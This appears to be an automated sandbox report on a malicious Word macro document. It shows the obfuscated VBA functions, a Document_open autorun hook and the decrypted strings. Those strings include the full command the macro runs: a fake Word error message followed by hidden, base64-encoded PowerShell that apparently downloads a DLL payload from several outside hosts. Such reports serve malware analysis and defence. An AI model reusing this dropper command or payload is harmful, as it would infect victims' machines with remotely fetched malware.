                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: TQutDNlhF

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: wAZjcaDbE

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: SOBiDVBG

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: LXmiCH

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: uQDVbE

                                                                    Array

                                                                    gPxXF

                                                                    Target

                                                                    Split

                                                                    IcBqyoTE

                                                                    vMqQFsCmr

                                                                    Array

                                                                    huzCVaAnM

                                                                    Target

                                                                    Split

                                                                    AEpDpJGH

                                                                    nmoAspl

                                                                    StringsDecrypted Strings
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    LineInstructionMeta Information
                                                                    117

                                                                    Function Zr9iedzfw6nr(Pdkbu8b4a_ucmmy2)

                                                                    118

                                                                    On Error Resume Next

                                                                    executed
                                                                    119

                                                                    Goto XDCYoHErU

                                                                    120

                                                                    Const OtpOArK as String = "A"

                                                                    121

                                                                    Const mbLvUI as String = ","

                                                                    122

                                                                    Const iJkmJG as String = "*high*,*critic*"

                                                                    123

                                                                    Dim uHhldyVW as Range

                                                                    123

                                                                    Set uHhldyVW = Array((OtpOArK), Target)

                                                                    Array

                                                                    OtpOArK

                                                                    Target

                                                                    124

                                                                    If uHhldyVW Is Nothing Then

                                                                    125

                                                                    Endif

                                                                    126

                                                                    Dim OAFQFBEFa() as String

                                                                    126

                                                                    OAFQFBEFa = Split(iJkmJG, mbLvUI)

                                                                    Split

                                                                    iJkmJG

                                                                    mbLvUI

                                                                    126

                                                                    XDCYoHErU:

                                                                    128

                                                                    N21io7rxzal10t = Pdkbu8b4a_ucmmy2

                                                                    129

                                                                    Goto PDgjIDCIF

                                                                    130

                                                                    Const vQbVHTJ as String = "A"

                                                                    131

                                                                    Const SRadpEcF as String = ","

                                                                    132

                                                                    Const mbdQXnNAJ as String = "*high*,*critic*"

                                                                    133

                                                                    Dim ZhuxR as Range

                                                                    133

                                                                    Set ZhuxR = Array((vQbVHTJ), Target)

                                                                    Array

                                                                    vQbVHTJ

                                                                    Target

                                                                    134

                                                                    If ZhuxR Is Nothing Then

                                                                    135

                                                                    Endif

                                                                    136

                                                                    Dim xcFaA() as String

                                                                    136

                                                                    xcFaA = Split(mbdQXnNAJ, SRadpEcF)

                                                                    Split

                                                                    mbdQXnNAJ

                                                                    SRadpEcF

                                                                    136

                                                                    PDgjIDCIF:

                                                                    138

                                                                    L4jc0swehya = Sotm_c8dqxel(N21io7rxzal10t)

                                                                    139

                                                                    Goto zPYsAGBC

                                                                    140

                                                                    Const gPxXF as String = "A"

                                                                    141

                                                                    Const vMqQFsCmr as String = ","

                                                                    142

                                                                    Const IcBqyoTE as String = "*high*,*critic*"

                                                                    143

                                                                    Dim UTUqCwyI as Range

                                                                    143

                                                                    Set UTUqCwyI = Array((gPxXF), Target)

                                                                    Array

                                                                    gPxXF

                                                                    Target

                                                                    144

                                                                    If UTUqCwyI Is Nothing Then

                                                                    145

                                                                    Endif

                                                                    146

                                                                    Dim MNzdmO() as String

                                                                    146

                                                                    MNzdmO = Split(IcBqyoTE, vMqQFsCmr)

                                                                    Split

                                                                    IcBqyoTE

                                                                    vMqQFsCmr

                                                                    146

                                                                    zPYsAGBC:

                                                                    148

                                                                    Zr9iedzfw6nr = L4jc0swehya

                                                                    149

                                                                    Goto mFRDA

                                                                    150

                                                                    Const huzCVaAnM as String = "A"

                                                                    151

                                                                    Const nmoAspl as String = ","

                                                                    152

                                                                    Const AEpDpJGH as String = "*high*,*critic*"

                                                                    153

                                                                    Dim EZSQT as Range

                                                                    153

                                                                    Set EZSQT = Array((huzCVaAnM), Target)

                                                                    Array

                                                                    huzCVaAnM

                                                                    Target

                                                                    154

                                                                    If EZSQT Is Nothing Then

                                                                    155

                                                                    Endif

                                                                    156

                                                                    Dim aEMwHJJ() as String

                                                                    156

                                                                    aEMwHJJ = Split(AEpDpJGH, nmoAspl)

                                                                    Split

                                                                    AEpDpJGH

                                                                    nmoAspl

                                                                    156

                                                                    mFRDA:

                                                                    158

                                                                    End Function

                                                                    Function Sotm_c8dqxel, APIs: 38, Strings: 19, Number of lines: 69, Relevance: 105.069
                                                                    APIsMeta Information

                                                                    Array

                                                                    UrnhFG

                                                                    Target

                                                                    Split

                                                                    LYEtDJDB

                                                                    AeZXCL

                                                                    Array

                                                                    bTSPCh

                                                                    Target

                                                                    Split

                                                                    XfKDE

                                                                    eJIkEagfC

                                                                    Array

                                                                    rlKxF

                                                                    Target

                                                                    Split

                                                                    VVDiBADws

                                                                    TziQbRH

                                                                    Replace

                                                                    		Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process Replace("ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd IAns wu db ndAgns wu db ndAFns wu db ndMAns wu db ndZQns wu db ndBUns wu db ndACns wu db nd0Ans wu db ndSQns wu db ndBUns wu db ndAEns wu db ndUAns wu db ndTQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAnns wu db ndAHns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndQQns wu db ndBSns wu db ndAGns wu db ndkAns wu db ndYQns wu db ndAnns wu db ndACns wu db ndsAns wu db ndJwns wu db ndBCns wu db ndAGns wu db ndwAns wu db ndRQns wu db ndA6ns wu db ndAGns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndNwns wu db ndBEns wu db ndACns wu db ndcAns wu db ndKwns wu db ndAnns wu db ndAEns wu db ndgAns wu db ndJwns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndAons wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAFns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBTns wu db ndAHns wu db ndQAns wu db ndZQns wu db ndBNns wu db ndACns wu db nd4Ans wu db ndaQns wu db ndBPns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndMAns wu db nddAns wu db ndBvns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAHns wu db ndMAns wu db ndeQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndLgns wu db ndBkns wu db ndAGns wu db ndkAns wu db ndcgns wu db ndBlns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu db n,"ns wu db nd",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAn

                                                                    He0e1df114_gsl7i

                                                                    Array

                                                                    rwAdJC

                                                                    Target

                                                                    Split

                                                                    buaHCHyIN

                                                                    HzpNhFB

                                                                    Array

                                                                    SdueDATuJ

                                                                    Target

                                                                    Split

                                                                    TQutDNlhF

                                                                    wAZjcaDbE

                                                                    Array

                                                                    SOBiDVBG

                                                                    Target

                                                                    Split

                                                                    LXmiCH

                                                                    uQDVbE

                                                                    StringsDecrypted Strings
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns w""u db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    LineInstructionMeta Information
                                                                    159

                                                                    Function Sotm_c8dqxel(Tw8vu7dybjhd)

                                                                    160

                                                                    Goto eRlxboGG

                                                                    executed
                                                                    161

                                                                    Const UrnhFG as String = "A"

                                                                    162

                                                                    Const AeZXCL as String = ","

                                                                    163

                                                                    Const LYEtDJDB as String = "*high*,*critic*"

                                                                    164

                                                                    Dim MvCNCxeRC as Range

                                                                    164

                                                                    Set MvCNCxeRC = Array((UrnhFG), Target)

                                                                    Array

                                                                    UrnhFG

                                                                    Target

                                                                    165

                                                                    If MvCNCxeRC Is Nothing Then

                                                                    166

                                                                    Endif

                                                                    167

                                                                    Dim jqLUKf() as String

                                                                    167

                                                                    jqLUKf = Split(LYEtDJDB, AeZXCL)

                                                                    Split

                                                                    LYEtDJDB

                                                                    AeZXCL

                                                                    167

                                                                    eRlxboGG:

                                                                    169

                                                                    Goto DJesE

                                                                    170

                                                                    Const bTSPCh as String = "A"

                                                                    171

                                                                    Const eJIkEagfC as String = ","

                                                                    172

                                                                    Const XfKDE as String = "*high*,*critic*"

                                                                    173

                                                                    Dim eFfcEAI as Range

                                                                    173

                                                                    Set eFfcEAI = Array((bTSPCh), Target)

                                                                    Array

                                                                    bTSPCh

                                                                    Target

                                                                    174

                                                                    If eFfcEAI Is Nothing Then

                                                                    175

                                                                    Endif

                                                                    176

                                                                    Dim jKGrEhAE() as String

                                                                    176

                                                                    jKGrEhAE = Split(XfKDE, eJIkEagfC)

                                                                    Split

                                                                    XfKDE

                                                                    eJIkEagfC

                                                                    176

                                                                    DJesE:

                                                                    178

                                                                    Goto xdoxB

                                                                    179

                                                                    Const rlKxF as String = "A"

                                                                    180

                                                                    Const TziQbRH as String = ","

                                                                    181

                                                                    Const VVDiBADws as String = "*high*,*critic*"

                                                                    182

                                                                    Dim nQutDRr as Range

                                                                    182

                                                                    Set nQutDRr = Array((rlKxF), Target)

                                                                    Array

                                                                    rlKxF

                                                                    Target

                                                                    183

                                                                    If nQutDRr Is Nothing Then

                                                                    184

                                                                    Endif

                                                                    185

                                                                    Dim rQMlbCDj() as String

                                                                    185

                                                                    rQMlbCDj = Split(VVDiBADws, TziQbRH)

                                                                    Split

                                                                    VVDiBADws

                                                                    TziQbRH

                                                                    185

                                                                    xdoxB:

                                                                    187

                                                                    Sotm_c8dqxel = Replace(Tw8vu7dybjhd, "ns w" + "u db nd", He0e1df114_gsl7i)

                                                                    Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process

                                                                    He0e1df114_gsl7i

                                                                    executed
                                                                    188

                                                                    Goto VZXgAzj

                                                                    189

                                                                    Const rwAdJC as String = "A"

                                                                    190

                                                                    Const HzpNhFB as String = ","

                                                                    191

                                                                    Const buaHCHyIN as String = "*high*,*critic*"

                                                                    192

                                                                    Dim KJKIF as Range

                                                                    192

                                                                    Set KJKIF = Array((rwAdJC), Target)

                                                                    Array

                                                                    rwAdJC

                                                                    Target

                                                                    193

                                                                    If KJKIF Is Nothing Then

                                                                    194

                                                                    Endif

                                                                    195

                                                                    Dim xMeNBMA() as String

                                                                    195

                                                                    xMeNBMA = Split(buaHCHyIN, HzpNhFB)

                                                                    Split

                                                                    buaHCHyIN

                                                                    HzpNhFB

                                                                    195

                                                                    VZXgAzj:

                                                                    197

                                                                    Goto XxDunFI

                                                                    198

                                                                    Const SdueDATuJ as String = "A"

                                                                    199

                                                                    Const wAZjcaDbE as String = ","

                                                                    200

                                                                    Const TQutDNlhF as String = "*high*,*critic*"

                                                                    201

                                                                    Dim ZtlVi as Range

                                                                    201

                                                                    Set ZtlVi = Array((SdueDATuJ), Target)

                                                                    Array

                                                                    SdueDATuJ

                                                                    Target

                                                                    202

                                                                    If ZtlVi Is Nothing Then

                                                                    203

                                                                    Endif

                                                                    204

                                                                    Dim yVlwI() as String

                                                                    204

                                                                    yVlwI = Split(TQutDNlhF, wAZjcaDbE)

                                                                    Split

                                                                    TQutDNlhF

                                                                    wAZjcaDbE

                                                                    204

                                                                    XxDunFI:

                                                                    206

                                                                    Goto cCNkM

                                                                    207

                                                                    Const SOBiDVBG as String = "A"

                                                                    208

                                                                    Const uQDVbE as String = ","

                                                                    209

                                                                    Const LXmiCH as String = "*high*,*critic*"

                                                                    210

                                                                    Dim zgEErH as Range

                                                                    210

                                                                    Set zgEErH = Array((SOBiDVBG), Target)

                                                                    Array

                                                                    SOBiDVBG

                                                                    Target

                                                                    211

                                                                    If zgEErH Is Nothing Then

                                                                    212

                                                                    Endif

                                                                    213

                                                                    Dim KDRcGw() as String

                                                                    213

                                                                    KDRcGw = Split(LXmiCH, uQDVbE)

                                                                    Split

                                                                    LXmiCH

                                                                    uQDVbE

                                                                    213

                                                                    cCNkM:

                                                                    215

                                                                    End Function

                                                                    Module: Ht_h_pv5qq7taeoe3a

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Ht_h_pv5qq7taeoe3a"

                                                                    Module: U765y5vgf_ao0faq

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "U765y5vgf_ao0faq"

                                                                    2

                                                                    Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = False

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Executed Functions
                                                                    Subroutine Document_open, APIs: 78, Strings: 0, Number of lines: 3, Relevance: 118.503
                                                                    APIsMeta Information

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: AjzpdH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: yqmFHJvF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: jbkkjHHCd

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Nkemmqfhxex

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Content

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Dt5ebejo9lypr_3vmp

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: wPuUI

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: TfZstIBWb

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: QNBiBDJF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: mQUInscCB

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: NxyDdD

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: PmHbFtBA

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ZcbWFy

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: uwcdCFcFJ

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: jmprxcAGG

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: upIoDlhH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: DpdIEHHc

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: BZLGJ

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Mid

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Name

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Application

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: LFmsHlGJO

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: DReLBGD

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: VlJBAxsF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: QttEc

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ybkwIF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: sInuFuLII

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: JNPIBwzJy

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: MtSXGFAwF

